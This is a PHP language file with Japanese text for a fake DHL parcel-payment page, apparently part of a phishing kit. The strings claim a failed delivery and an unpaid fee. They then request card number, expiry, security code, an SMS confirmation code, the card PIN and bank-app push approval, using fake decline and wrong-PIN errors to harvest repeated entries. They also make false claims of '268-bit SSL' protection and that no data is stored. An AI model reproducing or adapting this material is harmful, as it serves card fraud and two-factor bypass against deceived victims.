<?php 
$langs = array(
    "title" => "DHL",
    "help_support" => "ヘルプとサポート",
    "home" => "ホーム",
    "ship" => "発送",
    "track" => "追跡",
    "delivery_services" => "配送サービス",
    "delivery_text" => "お荷物の配送準備が整いました。続行するには、必要な料金をお支払いください。",
    "card_declined_error" => "カードが拒否されました。別のカードをお試しいただくか、銀行にお問い合わせください。",
    "cardholder_name" => "カード所有者の名前",
    "card_number" => "カード番号",
    "expiry_code" => "有効期限",
    "security_code" => "セキュリティコード",
    "continue" => "続ける",
    "ssl_security" => "このページは、268ビットのSSL暗号化で保護されています。",
    "payment_security_notice" => "当社の支払いページは非常に安全です。お客様の個人情報および支払い情報は、先進的なセキュリティプロトコルを使用して完全に暗号化および保護されており、データが安全に保たれることを保証します。さらに、支払い情報は一切保存しません。",
    "about_dhl" => "DHLについて",
    "press" => "プレス",
    "careers" => "キャリア",
    "legal_notice" => "法的通知",
    "alerts" => "アラート",
    "fraud_awareness" => "詐欺に対する意識",
    "important_information" => "重要な情報",
    "legal" => "法的",
    "terms_conditions" => "利用規約",
    "privacy_notice" => "プライバシー通知",
    "contact_support" => "お問い合わせとサポート",
    "faqs" => "よくある質問",
    "contact_us" => "お問い合わせ",
    "find_location" => "場所を探す",
    "payment_confirmation" => "支払い確認",
    "confirm_payment_text" => "この支払いを確認するには、電話番号に送信されたコードを送信してください。",
    "invalid_confirmation_code" => "確認コードが無効です。もう一度お試しください。",
    "confirmation_code" => "確認コード",
    "additional_verification" => "提供された支払い方法の追加確認が必要です。続行するには、カードPINを入力してください。",
    "incorrect_card_pin" => "カードPINが正しくありません。",
    "card_pin" => "カードPIN",
    "please_wait" => "しばらくお待ちください...",
    "do_not_leave" => "このページを離れないでください。自動的にリダイレクトされます。",
    "payment_successful" => "支払いが成功しました！",
    "payment_success_text" => "お支払いは正常に完了しました。ご連絡先にて、すぐにお荷物の最新情報をお受け取りいただけます。ご信頼いただき、ありがとうございます！",
    "app_title" => "お支払いを確認してください",
"app_text" => "受信したプッシュ通知をクリックして、銀行アプリでお支払いを確認してください。",
"track_title" => "配達の試みが失敗しました。",
        "track_text" => "必要な料金がまだ支払われていないため、荷物を配達できませんでした。<br>下の「続行」をクリックして支払い方法を追加し、お支払いを完了してください。",
        "table" => ["追跡番号：", "日付：", "金額："]


);
?>
